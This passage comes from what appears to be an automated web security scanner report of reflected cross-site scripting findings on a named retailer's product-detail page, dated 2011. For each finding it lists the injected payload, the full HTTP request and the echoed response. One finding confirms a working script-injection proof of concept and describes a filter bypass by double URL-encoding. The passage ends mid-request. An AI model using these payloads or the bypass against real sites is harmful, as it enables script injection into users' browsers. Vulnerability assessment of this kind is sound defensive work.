1.43. http://www.shopping.hp.com/webapp/shopping/product_detail.do [landing parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.shopping.hp.com
Path:   /webapp/shopping/product_detail.do

Issue detail

The value of the landing request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b92ce"%3b97ca51096cb was submitted in the landing parameter. This input was echoed as b92ce";97ca51096cb in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webapp/shopping/product_detail.do?storeName=computer_store&landing=desktopsb92ce"%3b97ca51096cb&category=p7xt_series&subcat1=rts&catLevel=3&mc=&product_code=BV704AA%23ABA&tab=&fromPage=/shopping/generic_subcategory.do&pageLink=true&bvLoadCart=1&omniData= HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/scat/desktops/p7xt_series/rts/3/computer_store
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; mbox=session#1316670895509-389686#1316672894|check#true#1316671094; s_pn=gw:us:en-us:home; s_re=ams; lang=en-us; cc=us; _rmc_n=1; OAX=Mhd7ak56iIkAATNs; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961899'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280650'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282219'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961900'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280652'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282221'%5D%5D; prop12=r602; hpshopping=1&user_id=mlkvid2S2AhwMy3quFbXdAbTng%3D%3D&home_slot_1=LP011AV%23ABA&home_slot_1_type=CTO&home_slot_1_category=desktops%2Fp7xt_series&home_slot_1_Affix=GS; hpcompc_usen=cartExists=false; EMID=; s_depth=18; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Asubcategory%3Ap7xt%20series; s_cc=true; s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhho%25253Ags%25253Asubcategory%25253Ap7xt%252520series%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AitemAdded('ADD_14182135_TO_CART'%25252C'SUBMIT_14182135_IMAGE'%25252C'big'%25252C'2'%2526oidt%253D2%2526ot%253DBUTTON; HP_EBUS_HP_CLICKS=4x16x6397

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:09:43 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkog96V2A1%2FMS3vu1XWdAKd0ic%3D&home_slot_1=BV704AA%23ABA%7CLP011AV%23ABA&home_slot_1_type=0%7CCTO&home_slot_1_category=0%7Cdesktops%2Fp7xt_series&home_slot_1_Affix=0%7CGSedf6ffb978573aea6e9e5a11&cart_id=1603777571; expires=Friday, 20-Jan-2012 01:09:43 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=true; domain=.hp.com; expires=Friday, 20-Jan-2012 01:09:43 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 222796

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html lang="en">
<head>
<!-- hp
...[SNIP]...
<!--
function readReviewsLink() {
return "javascript:retrieveURL('http://www.shopping.hp.com/webapp/shopping/product_detail.do?storeName=storefronts&landing=desktopsb92ce";97ca51096cb&category=p7xt_series&subcat1=rts&product_code=BV704AA%23ABA&catLevel=3&mc=&ajaxCall=true&tab=reviews', 'ProductContent');javascript:tabControl('pdp_reviewsTab_on');javascript:currentTab('reviews');";

...[SNIP]...

1.44. http://www.shopping.hp.com/webapp/shopping/product_detail.do [mc parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.shopping.hp.com
Path:   /webapp/shopping/product_detail.do

Issue detail

The value of the mc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b15f6"%3b31ab6ba7d14 was submitted in the mc parameter. This input was echoed as b15f6";31ab6ba7d14 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webapp/shopping/product_detail.do?storeName=computer_store&landing=desktops&category=p7xt_series&subcat1=rts&catLevel=3&mc=b15f6"%3b31ab6ba7d14&product_code=BV704AA%23ABA&tab=&fromPage=/shopping/generic_subcategory.do&pageLink=true&bvLoadCart=1&omniData= HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/scat/desktops/p7xt_series/rts/3/computer_store
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; mbox=session#1316670895509-389686#1316672894|check#true#1316671094; s_pn=gw:us:en-us:home; s_re=ams; lang=en-us; cc=us; _rmc_n=1; OAX=Mhd7ak56iIkAATNs; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961899'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280650'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282219'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961900'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280652'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282221'%5D%5D; prop12=r602; hpshopping=1&user_id=mlkvid2S2AhwMy3quFbXdAbTng%3D%3D&home_slot_1=LP011AV%23ABA&home_slot_1_type=CTO&home_slot_1_category=desktops%2Fp7xt_series&home_slot_1_Affix=GS; hpcompc_usen=cartExists=false; EMID=; s_depth=18; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Asubcategory%3Ap7xt%20series; s_cc=true; s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhho%25253Ags%25253Asubcategory%25253Ap7xt%252520series%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AitemAdded('ADD_14182135_TO_CART'%25252C'SUBMIT_14182135_IMAGE'%25252C'big'%25252C'2'%2526oidt%253D2%2526ot%253DBUTTON; HP_EBUS_HP_CLICKS=4x16x6397

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:10:40 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkog96V2A1%2FMS3vu1XWdAKd0ic%3D&home_slot_1=BV704AA%23ABA%7CLP011AV%23ABA&home_slot_1_type=0%7CCTO&home_slot_1_category=0%7Cdesktops%2Fp7xt_series&home_slot_1_Affix=0%7CGSedf6ffb978573aea6e9e5a11&cart_id=1603777571; expires=Friday, 20-Jan-2012 01:10:41 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=true; domain=.hp.com; expires=Friday, 20-Jan-2012 01:10:41 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 224578

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html lang="en">
<head>
<!-- hp
...[SNIP]...
n "javascript:retrieveURL('http://www.shopping.hp.com/webapp/shopping/product_detail.do?storeName=storefronts&landing=desktops&category=p7xt_series&subcat1=rts&product_code=BV704AA%23ABA&catLevel=3&mc=b15f6";31ab6ba7d14&ajaxCall=true&tab=reviews', 'ProductContent');javascript:tabControl('pdp_reviewsTab_on');javascript:currentTab('reviews');";
}
//-->
...[SNIP]...

1.45. http://www.shopping.hp.com/webapp/shopping/product_detail.do [mc parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.shopping.hp.com
Path:   /webapp/shopping/product_detail.do

Issue detail

The value of the mc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71aa8"%20a%3db%20b053a1c60d2 was submitted in the mc parameter. This input was echoed as 71aa8" a=b b053a1c60d2 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /webapp/shopping/product_detail.do?storeName=computer_store&landing=desktops&category=p7xt_series&subcat1=rts&catLevel=3&mc=71aa8"%20a%3db%20b053a1c60d2&product_code=BV704AA%23ABA&tab=&fromPage=/shopping/generic_subcategory.do&pageLink=true&bvLoadCart=1&omniData= HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/scat/desktops/p7xt_series/rts/3/computer_store
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; mbox=session#1316670895509-389686#1316672894|check#true#1316671094; s_pn=gw:us:en-us:home; s_re=ams; lang=en-us; cc=us; _rmc_n=1; OAX=Mhd7ak56iIkAATNs; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961899'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280650'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282219'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961900'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280652'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282221'%5D%5D; prop12=r602; hpshopping=1&user_id=mlkvid2S2AhwMy3quFbXdAbTng%3D%3D&home_slot_1=LP011AV%23ABA&home_slot_1_type=CTO&home_slot_1_category=desktops%2Fp7xt_series&home_slot_1_Affix=GS; hpcompc_usen=cartExists=false; EMID=; s_depth=18; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Asubcategory%3Ap7xt%20series; s_cc=true; s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhho%25253Ags%25253Asubcategory%25253Ap7xt%252520series%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AitemAdded('ADD_14182135_TO_CART'%25252C'SUBMIT_14182135_IMAGE'%25252C'big'%25252C'2'%2526oidt%253D2%2526ot%253DBUTTON; HP_EBUS_HP_CLICKS=4x16x6397

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:10:37 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkog96V2A1%2FMS3vu1XWdAKd0ic%3D&home_slot_1=BV704AA%23ABA%7CLP011AV%23ABA&home_slot_1_type=0%7CCTO&home_slot_1_category=0%7Cdesktops%2Fp7xt_series&home_slot_1_Affix=0%7CGSedf6ffb978573aea6e9e5a11&cart_id=1603777571; expires=Friday, 20-Jan-2012 01:10:37 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=true; domain=.hp.com; expires=Friday, 20-Jan-2012 01:10:37 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 224626

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html lang="en">
<head>
<!-- hp
...[SNIP]...
f="javascript:retrieveURL('http://www.shopping.hp.com/webapp/shopping/product_detail.do?storeName=storefronts&landing=desktops&category=p7xt_series&subcat1=rts&product_code=BV704AA%23ABA&catLevel=3&mc=71aa8" a=b b053a1c60d2&ajaxCall=true&tab=reviews', 'ProductContent');javascript:tabControl('pdp_reviewsTab_on');javascript:currentTab('reviews');" title="javascript:retrieveURL('http://www.shopping.hp.com/webapp/shopping/pr
...[SNIP]...

1.46. http://www.shopping.hp.com/webapp/shopping/product_detail.do [omniData parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.shopping.hp.com
Path:   /webapp/shopping/product_detail.do

Issue detail

The value of the omniData request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 549e5%2527%253balert%25281%2529%252f%252f9d266d5f0bd was submitted in the omniData parameter. This input was echoed as 549e5';alert(1)//9d266d5f0bd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the omniData request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /webapp/shopping/product_detail.do?storeName=computer_store&landing=desktops&category=p7xt_series&subcat1=rts&catLevel=3&mc=&product_code=BV704AA%23ABA&tab=&fromPage=/shopping/generic_subcategory.do&pageLink=true&bvLoadCart=1&omniData=549e5%2527%253balert%25281%2529%252f%252f9d266d5f0bd HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/scat/desktops/p7xt_series/rts/3/computer_store
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; mbox=session#1316670895509-389686#1316672894|check#true#1316671094; s_pn=gw:us:en-us:home; s_re=ams; lang=en-us; cc=us; _rmc_n=1; OAX=Mhd7ak56iIkAATNs; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961899'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280650'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282219'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961900'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280652'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282221'%5D%5D; prop12=r602; hpshopping=1&user_id=mlkvid2S2AhwMy3quFbXdAbTng%3D%3D&home_slot_1=LP011AV%23ABA&home_slot_1_type=CTO&home_slot_1_category=desktops%2Fp7xt_series&home_slot_1_Affix=GS; hpcompc_usen=cartExists=false; EMID=; s_depth=18; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Asubcategory%3Ap7xt%20series; s_cc=true; s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhho%25253Ags%25253Asubcategory%25253Ap7xt%252520series%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AitemAdded('ADD_14182135_TO_CART'%25252C'SUBMIT_14182135_IMAGE'%25252C'big'%25252C'2'%2526oidt%253D2%2526ot%253DBUTTON; HP_EBUS_HP_CLICKS=4x16x6397

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:12:51 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkpgtuW3gh8MCnpuVDWeQyYm2vi&home_slot_1=BV704AA%23ABA%7CLP011AV%23ABA&home_slot_1_type=0%7CCTO&home_slot_1_category=0%7Cdesktops%2Fp7xt_series&home_slot_1_Affix=0%7CGSedf6ffb9e8a695fbc9b6831d&cart_id=1603777709; expires=Friday, 20-Jan-2012 01:12:52 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=true; domain=.hp.com; expires=Friday, 20-Jan-2012 01:12:52 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 224427

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html lang="en">
<head>
<!-- hp
...[SNIP]...
ull && addlAccount.length>0)ns+=","+ addlAccount; void(s_gs(ns));
}


if (window.hpmetrics == null) { window.hpmetrics = {}; }
window.hpmetrics.isearch = {
'search_term' : '549e5';alert(1)//9d266d5f0bd',
'search_referrer' : '[Exception in:/shopping/product_detail/product_detail.jsp] Index: 1, Size: 1

</div>
...[SNIP]...

1.47. http://www.shopping.hp.com/webapp/shopping/product_detail.do [storeName parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.shopping.hp.com
Path:   /webapp/shopping/product_detail.do

Issue detail

The value of the storeName request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 326dc'%3bb71c7de3e6a was submitted in the storeName parameter. This input was echoed as 326dc';b71c7de3e6a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webapp/shopping/product_detail.do?storeName=computer_store326dc'%3bb71c7de3e6a&landing=desktops&category=p7xt_series&subcat1=rts&catLevel=3&mc=&product_code=BV704AA%23ABA&tab=&fromPage=/shopping/generic_subcategory.do&pageLink=true&bvLoadCart=1&omniData= HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/scat/desktops/p7xt_series/rts/3/computer_store
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; mbox=session#1316670895509-389686#1316672894|check#true#1316671094; s_pn=gw:us:en-us:home; s_re=ams; lang=en-us; cc=us; _rmc_n=1; OAX=Mhd7ak56iIkAATNs; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961899'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280650'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282219'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961900'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280652'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282221'%5D%5D; prop12=r602; hpshopping=1&user_id=mlkvid2S2AhwMy3quFbXdAbTng%3D%3D&home_slot_1=LP011AV%23ABA&home_slot_1_type=CTO&home_slot_1_category=desktops%2Fp7xt_series&home_slot_1_Affix=GS; hpcompc_usen=cartExists=false; EMID=; s_depth=18; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Asubcategory%3Ap7xt%20series; s_cc=true; 